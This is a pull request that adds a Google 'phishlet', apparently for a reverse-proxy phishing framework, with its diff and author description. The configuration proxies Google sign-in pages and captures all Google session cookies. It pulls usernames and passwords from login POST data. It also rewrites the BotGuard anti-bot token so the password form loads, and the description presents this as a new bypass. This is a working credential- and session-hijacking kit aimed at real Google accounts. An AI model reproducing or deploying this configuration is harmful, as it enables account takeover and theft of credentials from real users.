### PR TITLE
Google phishlet

### DIFF
--- a/phishlets/google.yaml
+++ b/phishlets/google.yaml
@@ -6,7 +6,6 @@ proxy_hosts:
   - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
 
 sub_filters:
-  - {triggers_on: 'accounts.google.com', orig_sub: '', domain: '', search: '(bgRequest=[A-z])\)', replace: "${1}) && (e.bgRequest[Object.keys(e.bgRequest)[2]][1] = \"FNL\")", mimes: ['text/html', 'application/json']}
   - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
   - {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html']}
 

--- a/phishlets/google.yaml
+++ b/phishlets/google.yaml
@@ -6,6 +6,7 @@ proxy_hosts:
   - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
 
 sub_filters:
+  - {triggers_on: 'accounts.google.com', orig_sub: '', domain: '', search: '(bgRequest=[A-z])\)', replace: "${1}) && (e.bgRequest[Object.keys(e.bgRequest)[2]][1] = \"FNL\")", mimes: ['text/html', 'application/json']}
   - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
   - {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html']}
 

--- a/phishlets/google.yaml
+++ b/phishlets/google.yaml
@@ -1,0 +1,51 @@
+author: '@TomAbel'
+min_ver: '2.3.0'
+
+proxy_hosts:
+  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
+  - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
+
+sub_filters:
+  - {triggers_on: 'accounts.google.com', orig_sub: '', domain: '', search: '(bgRequest=[A-z])\)', replace: "${1}) && (e.bgRequest[Object.keys(e.bgRequest)[2]][1] = \"FNL\")", mimes: ['text/html', 'application/json']}
+  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
+  - {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html']}
+
+auth_tokens:
+  - domain: '.google.com'
+    keys: [".*,regexp"]
+  - domain: 'accounts.google.com'
+    keys: [".*,regexp"]
+  - domain: 'myaccount.google.com'
+    keys: [".*,regexp"]
+  - domain: 'mail.google.com'
+    keys: [".*,regexp"]
+
+credentials:
+  username:
+    key: 'f.req'
+    search: '\[\]\]\,\"([^"]*)\"\,'
+    type: 'post'
+  password:
+    key: 'f.req'
+    search: ',\["([^"]*)",.*?\]\]\]'
+    type: 'post'
+
+auth_urls:
+  - '/CheckCookie'
+
+login:
+  domain: 'accounts.google.com'
+  path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'
+
+js_inject:
+  - trigger_domains: ['myaccount.google.com']
+    trigger_paths: ['.*?']
+    script: |
+      (function () {
+        'use strict';
+        let subdomain = window.location.host.split('.')[0];
+        if (subdomain == "myaccount") {
+          window.location.host = "myaccount.google.com";
+          // console.log("redirecting to myaccount.google.com");
+        }
+      }());


### PR DESCRIPTION
- Replace the botguard token with an error.

- Fix the password regex so it won't capture the captcha token if captcha is present. 

- Redirect to myaccount.google.com when tokens captured.

- Remove useless code and use placeholders correctly.

Editing the token enables the password form, which none of the phishlets currently achieve. Replacing it with an error is great because it doesn't require getting a valid token.

There's still some extra checks implemented when you attempt to login from a new location (email me if you have any info on that). The phishlet won't bypass those checks but it works on my machine

¯\_(ツ)_/¯